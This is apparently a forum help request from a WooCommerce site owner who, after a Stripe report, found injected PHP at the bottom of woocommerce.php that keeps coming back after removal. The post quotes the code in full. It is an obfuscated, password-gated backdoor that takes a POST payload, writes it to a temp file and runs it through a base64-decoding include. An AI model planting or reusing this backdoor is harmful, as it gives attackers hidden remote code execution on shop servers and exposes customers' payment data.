Hi there.
We have to start independent investigation due to stripe report. After detailed scan investigation company reported strange code inside woocommerce.php file at the very bottom:
if (isset($_POST[“_dalfgj89qerauid”],$_POST[‘WP_5f2a8b’]) && sha1($_POST[‘WP_5f2a8b’]) == “5f2a8bb0b28dcbe4fde4d6ce75500dbfb8a45100″) { $_oxyu = tempnam(sys_get_temp_dir(),”dafkjgjdk”); file_put_contents($_oxyu,$_POST[“_dalfgj89qerauid”]); require_once “php”.”:”.”//filt”.”e”.”r/c”.”onvert.”.”ba”.”s”.”e”.”64-“.”d”.”e”.”code/co”.”n”.”v”.”er”.”t.b”.”a”.”s”.”e64-de”.”co”.”de/”.”resou”.”rce”.”=”.$_oxyu; unlink($_oxyu); die(); }
Every time we removing above code and saving file that code returning to the same place quite quick. Can anyone help please or have ideas how to sort this issue please.
Thanks